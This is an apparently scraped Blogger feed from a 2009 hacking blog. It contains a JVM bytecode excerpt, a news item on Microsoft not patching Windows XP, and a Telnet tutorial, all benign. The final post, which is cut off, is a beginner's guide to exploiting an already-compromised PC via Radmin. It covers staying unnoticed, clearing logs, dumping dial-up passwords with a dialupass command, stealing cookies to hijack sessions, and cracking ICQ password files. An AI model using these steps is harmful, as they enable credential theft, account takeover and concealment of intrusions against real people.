/&gt;IADD&lt;br /&gt;ISTORE 1&lt;br /&gt;Label: L658705244&lt;br /&gt;ILOAD 1&lt;br /&gt;ACC_FINAL 13&lt;br /&gt;IMUL&lt;br /&gt;ISTORE 1&lt;br /&gt;GOTO L1466604866&lt;br /&gt;Label: L329949514&lt;br /&gt;RETURN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Перші дві команди ініціалізує змінну i (з номером 1) значенням -17.&lt;br /&gt;&lt;br /&gt;Далі у нас починається тіло циклу. Для реалізації якого буде потрібно мітки,&lt;br /&gt;команда переходу і умовний оператор. У тілі нашого методу аж цілих три позначок. Перша позначка означає початок циклу. Друга потрібна для умовного оператора, а остання знаменує кінець циклу. Умовного оператор має один параметр мітку переходу. Перед тим, як його викликати сравніваеми значення повинні лежати на стеку. Для порівняння з нулем використовується окрема команда. Для кожного типу є свій оператор порівняння. Для int він IF_ICMPGE. Після порівняння сравніваеми значення забираються зі стека. Для арифметичних дій з двома змінним їх так само як і для умовного оператора потрібно попередньо покласти на стек. Після виконання вони знімаються з стека, а на їх місце кладеться результат.&lt;br /&gt;&lt;br /&gt;На це короткий екскурс в байт-код закінчено, деякі питання такі як виключення, синхронізація не були порушені. Я сподіваюся, що маючи уявлення про байт коді читач легко впоратися з ними. У наступній частині ми розглянемо інструменти які застосовуються для модифікації байт-коду.&lt;br /&gt;&lt;br /&gt;http://math-and-prog.blogspot.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-7686637114128156846?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/7686637114128156846/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=7686637114128156846' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7686637114128156846'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7686637114128156846'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/09/java.html' title='Структура байт-коду віртуальної машини Java'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-5351254539678720082</id><published>2009-09-16T02:11:00.001-07:00</published><updated>2009-09-16T02:11:53.092-07:00</updated><title type='text'>Питання безпеки у веб-технологіях / Microsoft відмовилася патчити Windows XP</title><content type='html'>від Хабрахабр: автор: alizar&lt;br /&gt;Кількість користувачів, яким сподобалася ця запис: 4&lt;br /&gt;На подив фахівців з безпеки, компанія Microsoft відмовилася патчити недавно виявлену уразливість TCP / IP у Windows XP і Windows 2000. Один з провідних менеджерів з безпеки програм Microsoft Едріан Стоун сказав, що цей фрагмент исходников занадто старий, має вік від 12 до 15 років, і розібратися в коді на цьому рівні «просто нереально» [backporting that level of code is essentially not feasible]. Ця фраза була сказана в прямому ефірі щомісячного вебкаста з безпеки (стенограма), відповідаючи на запитання слухачів.&lt;br /&gt;&lt;br /&gt;Два бага в стеку TCP / IP були виявлено 8 вересня. Уразливість зачіпає також Windows Vista, Windows Server 2003 і Windows Server 2008. Для трьох згаданих систем вийшов апдейт MS09-048, а от до Windows 2000 і Windows XP патча можна не чекати. Для захисту від шкідливих TCP / IP-пакетів користувачам Windows XP рекомендовано скористатися функціоналом вбудованого файрвола.&lt;br /&gt;&lt;br /&gt;Потрібно нагадати, що Windows XP - найпопулярніша в світі ОС на сьогоднішній день. За умовами угоди для користувачів, Microsoft зобов'язана випускати апдейти безпеки для Windows XP аж до квітня 2014 р., пише Computerworld.&lt;br /&gt;&lt;br /&gt;Відмова патчити знайдену уразливість для системи, яка знаходиться на підтримці - досить рідкісне явище. За словами Стоуна, останній раз Microsoft йшла на такий крок у березні 2003 року з Windows NT 4.0.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-5351254539678720082?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/5351254539678720082/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=5351254539678720082' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5351254539678720082'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5351254539678720082'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/09/microsoft-windows-xp.html' title='Питання безпеки у веб-технологіях / Microsoft відмовилася патчити Windows XP'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-1305076260233973959</id><published>2009-09-16T02:08:00.000-07:00</published><updated>2009-09-16T02:10:37.411-07:00</updated><title type='text'>Блог</title><content type='html'>ВІн знову оживе !!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-1305076260233973959?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/1305076260233973959/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=1305076260233973959' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1305076260233973959'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1305076260233973959'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/09/blog-post.html' title='Блог'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-3295394357308992021</id><published>2009-05-14T08:35:00.000-07:00</published><updated>2009-05-14T08:37:05.472-07:00</updated><title type='text'>#@*(#(&amp;@@#!$%#^@&amp;</title><content type='html'>Блог временно необновляетса так как нет технической возможности !&lt;br /&gt;ЕТо ненадолго&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-3295394357308992021?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/3295394357308992021/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=3295394357308992021' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3295394357308992021'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3295394357308992021'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/05/blog-post_14.html' title='#@*(#(&amp;@@#!$%#^@&amp;'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-4311046966025117767</id><published>2009-05-01T08:30:00.000-07:00</published><updated>2009-05-01T08:31:25.537-07:00</updated><title type='text'>Telnet ?</title><content type='html'>В Telnet, как правило, вкладывают два смысла. Во первых Telnet — это протокол эмуляции терминала, через который осуществляется удаленный доступ в Internet. А во вторых, telnet это программа UNIX с аналогичными функциями (пишется с маленькой буквы, ибо в UNIX это важно). Запустив такую программу, вы увидите на экране своего монитора удаленный терминал. Все это может быть реальностью только за деньги, То есть вы должны получить доступ в Internet на уровне Dial-up. Впрочем, в Internet существуют сервера, которые предоставляют бесплатный ограниченный доступ через Telnet к некоторым базам данных.&lt;br /&gt;&lt;br /&gt;Программа telnet через определенные команды позволяет управлять параметрами сеанса связи только через командный режим. Это означает, что сначала вы коннектитесь с удаленным хостом и после того как нажимаете escape-последовательность, попадаете в командный режим telnet. Сеанс связи поддерживается как вашим софтом, так и софтом удаленной машины. Если копать глубже, то связь осуществляется через протокол TCP посредством пакетов UDP.&lt;br /&gt;&lt;br /&gt;Таким образом Telnet это:&lt;br /&gt;&lt;br /&gt;● регистрация на удаленном компьютере;&lt;br /&gt;&lt;br /&gt;● использование софта Internet, в том числе клиентских программ на удаленном компьютере.&lt;br /&gt;&lt;br /&gt;● запуск доступного софта на удаленном компьютере.&lt;br /&gt;&lt;br /&gt;Далее мы будем разбирать Telnet на основе программы NCSA Telnet. Этот софт предоставляет интерактивный доступ с писишного компьютера к телнетовским серверам сети TCP/IP.&lt;br /&gt;&lt;br /&gt;NSCA Telnet&lt;br /&gt;&lt;br /&gt;Многие, говоря о Telnet, подразумевают UNIX. А те, кто считают, что знают UNIX, работают в Internet через Telnet. Мы уходим от тех и от других. На время. Мы погрузимся в старый добрый DOS, так как NCSA Telnet работает в стандартной MS DOS.&lt;br /&gt;&lt;br /&gt;Запуск NCSA Telnet осуществляется после ввода следующей команды:&lt;br /&gt;&lt;br /&gt;telnet hostname&lt;br /&gt;&lt;br /&gt;Если все набрано правильно, то вы соединитесь с хостом hostname. Этот хост попросит вас ввести регистрационное имя и пароль.&lt;br /&gt;&lt;br /&gt;NCSA Telnet эмулирует терминал VT100. Но операционка удаленного хоста не может определить тип вашего терминала. Вы должны определить его сами. Для удаленных UNIX-компьютеров введите:&lt;br /&gt;&lt;br /&gt;newton% set term=vt100;tset&lt;br /&gt;&lt;br /&gt;Выход из NCSA Telnet зависит от того количества сессий, которое вы имеете в данный момент. То есть, вы должны разорвать связь с каждым хостом.&lt;br /&gt;&lt;br /&gt;Результатом ваших действий должно быть обычное приглашение вашей операционки.&lt;br /&gt;&lt;br /&gt;Вы также можете завершить сеанс через комбинацию клавиш Alt-X. Эта команда закрывает только текущую сессию.&lt;br /&gt;&lt;br /&gt;Лучшие клавиатурные эквиваленты&lt;br /&gt;&lt;br /&gt;● Alt-A Дополнительная сессия.&lt;br /&gt;&lt;br /&gt;● Alt-N Следующая сессия.&lt;br /&gt;&lt;br /&gt;● Alt-D Перехватить активный текст и послать его в файл.&lt;br /&gt;&lt;br /&gt;● Alt-Z Сделать сессию невидимой, но&lt;br /&gt;активизированной.&lt;br /&gt;&lt;br /&gt;● Alt-E Выйти в оболочку DOS.&lt;br /&gt;&lt;br /&gt;● Alt-G Графическое меню.&lt;br /&gt;&lt;br /&gt;● Alt-C Включить/отключить режим перехвата.&lt;br /&gt;&lt;br /&gt;● Alt-R Отключить экран VT100.&lt;br /&gt;&lt;br /&gt;● Alt-H Подсказка.&lt;br /&gt;&lt;br /&gt;● Alt-Y Прервать процесс.&lt;br /&gt;&lt;br /&gt;● Alt-B Предыдущая сессия.&lt;br /&gt;&lt;br /&gt;● Alt-O Блокировать вывод.&lt;br /&gt;&lt;br /&gt;● Alt-U Удалить строку.&lt;br /&gt;&lt;br /&gt;● Alt-K Удалить символ.&lt;br /&gt;&lt;br /&gt;● Alt-F Начать передачу файла.&lt;br /&gt;&lt;br /&gt;● Home Выйти из графического режима.&lt;br /&gt;&lt;br /&gt;● Alt-I Переслать IP-адрес удаленному компьютеру.&lt;br /&gt;&lt;br /&gt;● Alt-S Пропустить прокрутку.&lt;br /&gt;&lt;br /&gt;● Alt-P Изменить параметры.&lt;br /&gt;&lt;br /&gt;● Alt-X Закрыть соединение.&lt;br /&gt;&lt;br /&gt;Непонятный VT100 и ясный локальный терминал&lt;br /&gt;&lt;br /&gt;В NCSA Telnet терминал вашего компьютера отображается на удаленном компьютере как терминал VT100. Вы же работаете на PC. Поэтому некоторые клавиши вашего компьютера отличаются от аналогичных на VT100.&lt;br /&gt;&lt;br /&gt;Сразу несколько сессий? ОК!&lt;br /&gt;&lt;br /&gt;NCSA Telnet позволяет открывать несколько сессий одновременно. Для этого вы должны ввести:&lt;br /&gt;&lt;br /&gt;telnet hostname hostname ...&lt;br /&gt;&lt;br /&gt;где hostname — имя компьютера, с которым вы коннектитесь.&lt;br /&gt;&lt;br /&gt;Что там есть в нашей строке состояния? Все!&lt;br /&gt;&lt;br /&gt;Терминал VT100 удаленного компьютера требует 24 строки. В 25 строке локального компьютера вы можете видеть состояние собственной сессии. Выделенные символы отображаются в нижнем левом углу. Все эти символы соответствуют удаленному хосту. Остальные символы могут отображать все что угодно.&lt;br /&gt;&lt;br /&gt;Открываем еще одну сессию&lt;br /&gt;&lt;br /&gt;Открыть еще одну сессию на текущем удаленном хосте или на другом хосте можно через клавиатурную комбинацию Alt-A.&lt;br /&gt;&lt;br /&gt;Указываем на хоста&lt;br /&gt;&lt;br /&gt;Вы можете телнетиться только через IP-адрес. Поэтому ваша первая задача — определить IP-адрес удаленного компьютера. Для этого настройте программу на поиск имен посредством соответствующей службы удаленного сервера.&lt;br /&gt;&lt;br /&gt;Прокручиваем в режиме обратной прокрутки&lt;br /&gt;&lt;br /&gt;Клавиша Scroll Lock позволяет не прокручивать экран, когда идет получение данных и включать/отключать режим обратной прокрутки. Режим обратной прокрутки дает вам возможность перемещать данные на экране стрелками или клавишами PgUp и PgDn. Помните, что в режиме обратной прокрутки нельзя оперировать командами telnet.&lt;br /&gt;&lt;br /&gt;Вырезаем и вставляем&lt;br /&gt;&lt;br /&gt;Находясь в режиме обратной прокрутки, вы можете копировать части текста одной сессии и вставлять эти части в другую. Попробуем скопировать текст в буфер и затем вставить его из буфера в новую сессию.&lt;br /&gt;&lt;br /&gt;1. Включите режим обратной прокрутки посредством нажатия клавиши Scroll Lock.&lt;br /&gt;&lt;br /&gt;2. Передвиньте курсор в начало текста и нажмите клавишу пробела.&lt;br /&gt;&lt;br /&gt;3. Передвиньте курсор в конец текста и нажмите клавишу пробела.&lt;br /&gt;&lt;br /&gt;4. Нажмите Alt-C. Выделенный текст скопирован.&lt;br /&gt;&lt;br /&gt;5. Выходим из режима обратной прокрутки и переключаемся на новую сессию посредством нажатия клавиш Alt-N или Alt-B.&lt;br /&gt;&lt;br /&gt;6. Помещаем курсор в желаемое место и нажимаем Alt-V.&lt;br /&gt;&lt;br /&gt;Выделенный текст помещен в новую сессию.&lt;br /&gt;&lt;br /&gt;Переключаемся между сессиями&lt;br /&gt;&lt;br /&gt;Переключиться между двумя активными сессиями можно через команду Alt-N. Имя активизированной сессии вы можете увидеть в левой нижней части экрана. Если вы хотите вернуться в старую сессию, то вы можете это сделать через команду Alt-B.&lt;br /&gt;&lt;br /&gt;Просматриваем сообщения экрана консоли&lt;br /&gt;&lt;br /&gt;Экран консоли отображает информацию, связанную с локальным и удаленным компьютером. Вызвать экран консоли вы можете через Alt-Z.&lt;br /&gt;&lt;br /&gt;Закрываем текущую сессию&lt;br /&gt;&lt;br /&gt;Командой Alt-X закрывается текущая сессия. Используя эту команду, мы наблюдали сбои на удаленном компьютере.&lt;br /&gt;&lt;br /&gt;Перехватываем текст экрана&lt;br /&gt;&lt;br /&gt;Если нажать Alt-C, то можно перехватить текст экрана и направить его в файл (то есть добавить текст к файлу capfile) или распечатать. Если вы повторно выберите команду Alt-C, вы отключите режим перехвата.&lt;br /&gt;&lt;br /&gt;Если в меню Parameters вместо стандартного файла для перехвата указать prn, то можно распечатать перехваченный текст.&lt;br /&gt;&lt;br /&gt;Невозможно перехватить текст активной сессии, если включен перехват в фоновой сессии. Решить эту проблему можно командой Alt-D.&lt;br /&gt;&lt;br /&gt;Игнорируем бесконечный текст&lt;br /&gt;&lt;br /&gt;Если вы хотите пропустить идущий бесконечным потоком текст, нажмите Alt-S. Вы пропустите текст только на экране, то есть сам текст будет находиться в буфере перехвата.&lt;br /&gt;&lt;br /&gt;Перезагружаем экран VT100&lt;br /&gt;&lt;br /&gt;Если вам не понравился текущий тип терминала и вы желаете установить новые параметры VT100 (точнее их установит удаленный компьютер), нажмите Alt-R. Параметры вашего экрана VT100, в этом случае, переустановятся таким образом, что отключится режим упаковки, разблокируется графический режим, а табуляторы установятся на каждую восьмую позицию.&lt;br /&gt;&lt;br /&gt;Все! Надоело! Больше не могу!&lt;br /&gt;&lt;br /&gt;Команда Ctrl-Shift-F3 применяется в том случае, когда ни одна из сессий не работает, Scroll Lock не горит, нажатие клавиш ALT-R и/или ALT-X не приводит ни к какому результату. После выполнения команды Ctrl-Shift-F3 вы выйдите из Telnet в DOS.&lt;br /&gt;&lt;br /&gt;Не разрывая связь, выходим в DOS&lt;br /&gt;&lt;br /&gt;Если вы хотите выйти в DOS и при этом оставаться в сессиях, нажмите Alt-E. В досовской оболочке вы можете использовать любые программы, кроме сетевой версии NCSA Telnet, сетевой версии программа FTP пользователя и программы format. Возврат в Telnet осуществляется командой exit.&lt;br /&gt;&lt;br /&gt;Устанавливаем параметры&lt;br /&gt;&lt;br /&gt;Если вы хотите изменить цвета, задать новый эхо-режим, настроить клавишу стирания символов, управлять режимом экрана и режимом пересылки файлов, дать другое имя сессии, типу терминала и файлу перехвата, нажмите Alt-P. После того, как вы в появившемся диалоговом окне Parameters модифицируете необходимые опции, нажмите клавишу F1 (для сохранения изменений) или Esc (для сохранения предыдущих параметров).&lt;br /&gt;&lt;br /&gt;Символы или строки?&lt;br /&gt;&lt;br /&gt;Вы можете воспользоваться достоинствами построчного режима в случае, если вам долго отвечает удаленный компьютер. Вы просто втаскиваете данные в буфер и пересылаете их единым пакетом на удаленный компьютер через нажатие клавиши Return. При этом вы можете воспользоваться следующими клавиатурными комбинациями:&lt;br /&gt;&lt;br /&gt;● если вы нажмете Ctrl-U, то буфер очистится.&lt;br /&gt;&lt;br /&gt;● удаление последнего символа, добавленного в буфер осуществляется клавишей Backspace.&lt;br /&gt;&lt;br /&gt;● после нажатия клавиши Tab данные буфера вместе с символом табуляции немедленно отправятся на удаленный компьютер.&lt;br /&gt;&lt;br /&gt;Два замечания относительно построчного режима:&lt;br /&gt;&lt;br /&gt;● любой управляющий символ можно отправить на удаленный компьютер лишь в том случае, если этот символ снабдить приставкой ^.&lt;br /&gt;&lt;br /&gt;● нельзя переслать на удаленный компьютер комбинации&lt;br /&gt;Ctrl-U или Backspace.&lt;br /&gt;&lt;br /&gt;В случае символьного режима ваши данные передаются на удаленный компьютер непосредственно в процессе их набора. Этот режим позволяет использовать весь экран вашего монитора для редактирования данных.&lt;br /&gt;&lt;br /&gt;А что если нажать Backspace?!&lt;br /&gt;&lt;br /&gt;По умолчанию, клавиша Backspace преобразовывается в код клавиши Delete. Некоторые удаленные компьютеры работают только с клавишей Backspace. Чтобы добиться совместимости, необходимо открыть меню Parameters и переустановить код клавиши Backspace.&lt;br /&gt;&lt;br /&gt;Хочу другое имя сессии!&lt;br /&gt;&lt;br /&gt;Вы можете изменить имя сессии появляющееся в строке состояния в правом нижнем углу через меню Parameters. В соответствующее поле данных вы можете ввести до 13 символов.&lt;br /&gt;&lt;br /&gt;Хочу другой терминал!&lt;br /&gt;&lt;br /&gt;В большинстве сессий эмулируется терминал VT100. У вас имеются другие возможности эмуляции:&lt;br /&gt;&lt;br /&gt;● выбрать VT100 с графикой Tektronix 4014.&lt;br /&gt;&lt;br /&gt;● использовать только команды VT100.&lt;br /&gt;&lt;br /&gt;● игнорировать коды VT100 и Tektronix 4014.&lt;br /&gt;&lt;br /&gt;Автоматический перенос строки&lt;br /&gt;&lt;br /&gt;Если вы не хотите смотреть на беспорядочный поток символов, используйте символы конца строк. При включенной опции автоматического переноса строки переполненный текст автоматически переходит на следующую строку.&lt;br /&gt;&lt;br /&gt;Адаптируемся к графическому интерфейсу&lt;br /&gt;&lt;br /&gt;Как правило, режим быстрого вывода текста через буфер экрана несовместим с Windows. В файле конфигурации посредством опции bios вы можете установить так называемый режим адаптации.&lt;br /&gt;&lt;br /&gt;В этом режиме текст на экране выводится через специальную программу, использующую доступ к BIOS.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-4311046966025117767?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/4311046966025117767/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=4311046966025117767' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/4311046966025117767'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/4311046966025117767'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/05/telnet.html' title='Telnet ?'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-6327287809556416973</id><published>2009-05-01T08:26:00.000-07:00</published><updated>2009-05-01T08:27:20.967-07:00</updated><title type='text'>Пароли и безопасность для всех .</title><content type='html'>Здарова всем начинающим хакерам!С вами redbu11.Да да,именно НАЧИНАЮЩИМ хакерам,потомучто то о чём сейчас пойдёт речь,всем опытным взломщикам давно известно.В одной из моих прошлых статей (Статья называется "2 идеальных метода взлома",тем кто её не читал,советую прочитать чтобы понимать лучше эту статью) я рассказывал о способах при помощи которых вы можете проникнуть в чужой компьютер и удалённо им управлять.Но я заметил по моим знакомым которые только начали заниматся хаком,и по многим новичкам в инете,что проникая в чужую систему имея возможность полнностью ею управлять,(Например при помощи радмина) то они просто начинают прикалыватся над челом,открывая ему блокнот на рабочем столе,и писать всякую дрянь,включать или выключать музыку,перезагружать компьютер и тд...Это всё конечно очень прикольно и весело,но ведь есть и идеи получше...&lt;br /&gt;&lt;br /&gt;-Ну вообщем,я обращаюсь ко всем кто так поступает получая доступ к чужой машине... - Эй,проснись!Ведь в твоих руках целая система полностью под твоим контролем!И ты в ней теперь имеешь все теже права что и настоящий админ!&lt;br /&gt;Зачем тогда тратить время зря на эти глупые шутки над админом и рисковать?Глупо!Есть же коечто лучше....&lt;br /&gt;-Конечно!Пассы!Именно они!Главная цель почти всех взломщиков!Давайте об этом и поговорим.&lt;br /&gt;&lt;br /&gt;И так,чуть выше я заговорил о том что мы рискуем так прикалываясь над админом.Конечно же рискуем.Ведь если админ видит что вдруг не с того не с сего у него на рабочем столе начинают вылетать всякие собщения,сами по себе открыватся блокноты,включатся и выключатся музыка,то наблюдая за всем этим "безобразием",он (или она) конечно же насторожатся,и начнутся подозрения что их взломали.При этом,если админ окажется не из ламеров,он может тебя спокойно вычеслить по IP и пожаловатся твоему провайдеру,и у тебя будут проблемы.Как они тебя вычеслят???Да очень просто.&lt;br /&gt;&lt;br /&gt;ПУНКТ 1-ЫЙ - БЕЗОПАСНОСТЬ.&lt;br /&gt;&lt;br /&gt;И так,немного о безопасности.&lt;br /&gt;*Как многие на этом прокалываются:&lt;br /&gt;&lt;br /&gt;-Вот например взламывая комп испольуя радмин,когда вы подключаетесь к кому-нибудь используя режим полного контроля,и не только,то тот к кому вы подключаетесь,если он откроет ярлычёк запущенного сервера радмина в нижнем правом углу панели инструментов,или наведёт курсор мыши на тот ярлычёк,то ему покажут текущии IP соединения с его компьютером,или же просмотрев логи,и он увидит ваш IP.&lt;br /&gt;-При взломе другим способом админ тоже может просмотреть текущии IP соедиения,и увидить вашь IP.&lt;br /&gt;Так что многие не зная этого прокалываются именно на этом.&lt;br /&gt;&lt;br /&gt;-Ну а теперь подумайте,ведь если вы будете делать всё тихо не вызывая у админа подозрений,то админ видя что всё тихо и ничего не подазревая,он даже и задумыватся не станет о том что его взломали. Как этого добится?Да тоже очень просто если соблюдать несколько правил.&lt;br /&gt;&lt;br /&gt;*Как обезопасится:&lt;br /&gt;&lt;br /&gt;-Если вы например взломали комп с помощью радмина,то делайте всё тихо,не прикалываясь над админом.Пре подключении,используте в радмине режим передачи данных,(File Transfer) так как админ не будет видеть всё происходящее на своих глазах и он более подходящий нам для нужных наших действий.&lt;br /&gt;-Ещё так сказать,чисть логи!Не оставляй лишний инфы о себе на взломанном компьютере,так как это могло бы привети к твоему вычеслению.И чисть за собой следы.Всё лишнее после взлома удаляй,подальше от глаз админа.=)&lt;br /&gt;-Если взламываешь другими способами,то тоже без лишних приколов,делая всё тихо,ведь злой дядя админ тоже не всегда спит.=)))&lt;br /&gt;&lt;br /&gt;Ну вот,о безопасноти разобрались,теперь можно переходить к пассам!Но не забывайте что безопасность прежде всего!!!&lt;br /&gt;&lt;br /&gt;ПУНКТ 2-ОЙ - ПАРОЛИ И ДРУГАЯ ИНФОРМАЦИЯ.&lt;br /&gt;&lt;br /&gt;Ну а теперь,о паролях.Как же о таком забыть!Если ты из тех кто всё только прикалывается над бедным в таких случаях админом,или не знаешь что делать со взломанным компьютером,то прочитайте этот пункт,и вы поймёте что раньше вы действительно ошибались!)))&lt;br /&gt;&lt;br /&gt;-Находясь внутри чужого компа,вы можете увести пароли от аськи,вконтакте,ящики,логи сайтов,пароли на интернет,и ещё кучу интерестный информации!Ведь это уже действительно интерестно и лучше всяких там шуточек!!!&lt;br /&gt;Вам наверное не терпится хоть немного узнать о том как достать хоть какие-нибудь пассы,тогда я вас обрадую,и расскажу вам о том как можно увести НЕКОТОРЫЕ пассы имея полный контроль над компом.(Чтобы потом небыло лишний осуждений и рассуждений,напоминаю,статья расчитана на совем новичков в этом деле,и описываю я здесь САМЫЕ ПРОСТЫЕ СПОСОБЫ для получения пассов.)&lt;br /&gt;Так-же тут будет часто использвася подключения через RAdmin,так как этот способ проще понять новичкам.&lt;br /&gt;&lt;br /&gt;-Начну я пожалуй с пассов на инет.Хоть это очень расостранённая тема на сей день,но оооочень многие про это незнают,но я надеюсь что они наткнувшись на эту статью узнают хоть что то нового для себя.&lt;br /&gt;Достаём пассы:&lt;br /&gt;&lt;br /&gt;1-Пассы на инет:&lt;br /&gt;&lt;br /&gt;-Самый простой способ заполучения паролей на интернет,это используя такую программу под названием "dialupass".Эта программа записываеит пароли от интернета жертвы в нужный тебе файл,и сохраняет их на компе у жертвы в нужном тебе месте.Очень просто.&lt;br /&gt;Представим что получили доступ к компу через радмин,и управляем им через RAdmin Viewer.&lt;br /&gt;Тогда действия будут таковы:&lt;br /&gt;&lt;br /&gt;*Как использовать эту прогу:&lt;br /&gt;&lt;br /&gt;И так для начала качаем эту прогу,скачать её можно с сайта нашей хак группы http://unlock-team.ucoz.ru/ в разделе "Софт и видео"&lt;br /&gt;Cкачали?Хорошо,теперь подключаемя к жертве в режиме "File Transfer",берём тот .exe файл из скачанного архива с программой,копируем его на комп к жертве например на диск C: (Можно куда хочешь,но так удобнее).Далее полключаемся к жертве в режиме "Telnet" для того чтобы запустить нашу прогу.И так,мы в режиме телнет,и теперь через командную строку запускаем нашу прогу,делаем это следующий командой:&lt;br /&gt;&lt;br /&gt;C:путь_к_проге /allusers /stext "Куда_сохранить_пассы".&lt;br /&gt;&lt;br /&gt;Поясняю:&lt;br /&gt;-С:путь_к_проге - путь к проге которую мы залили жертве.&lt;br /&gt;-/allusers - Получить пароли всех пользователей.&lt;br /&gt;-/stext - Сохранить пассы в текстовом виде.&lt;br /&gt;-"Куда_сохранить_пассы" - думаю и так всё ясно,куда сохранятса пассы.&lt;br /&gt;&lt;br /&gt;Значит если наша прога называется dialup.exe и мы хотим сохранить полуенные пассы на диске у жертвы в файле passwords.txt то команда будет такова:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;C:dialup.exe /allusers /stext "passwords.txt"&lt;br /&gt;&lt;br /&gt;Всё,вводим эту команду и жмём ENTER.После того как мы это сделали,и если мы всё правильно сделали,снова подключаемся&lt;br /&gt;к жертве в режиме "File Transfer" и забираем наши пассы)))&lt;br /&gt;Но не забываем удалить все эти файлы поссле получения пассов!&lt;br /&gt;Пассы вы получите если они введенны и сохранены в настройках системы,что бывает почти всегда пре dial-up соединениях.&lt;br /&gt;&lt;br /&gt;*Заполучнеия Cookies.&lt;br /&gt;&lt;br /&gt;Для этого идём по адресу C:Documents and SettingsИмя_пользователяCookies и забираем его куки.Потом заменяем нужные нам куки жертвы например от логов на сайте каком нибудь на свои,и система принимает нас за него.Всё очень просто.Так же если завладеете куками его ящика,то зайдя в ящик посмотрите нет ли там писем от поддтверждения регистрации,напоминания пароля,или просто письма которые высылают после регистрации в которых указывают твои данные,в том числе и пасс.У меня так часто бывало.&lt;br /&gt;&lt;br /&gt;*Пароли от аськи.&lt;br /&gt;&lt;br /&gt;Чаще всего они хранятся в .dat файлах которые находятся в папке с асей или в даже встречал случаи когда они были в папке с кукисами.&lt;br /&gt;Такчто поищите,скопируйте из себе,потом берите например IPDBrute,и расшифровывайте пассы.Тут тоже всё очень просто.&lt;br /&gt;&lt;br /&gt;*Другие файлы.&lt;br 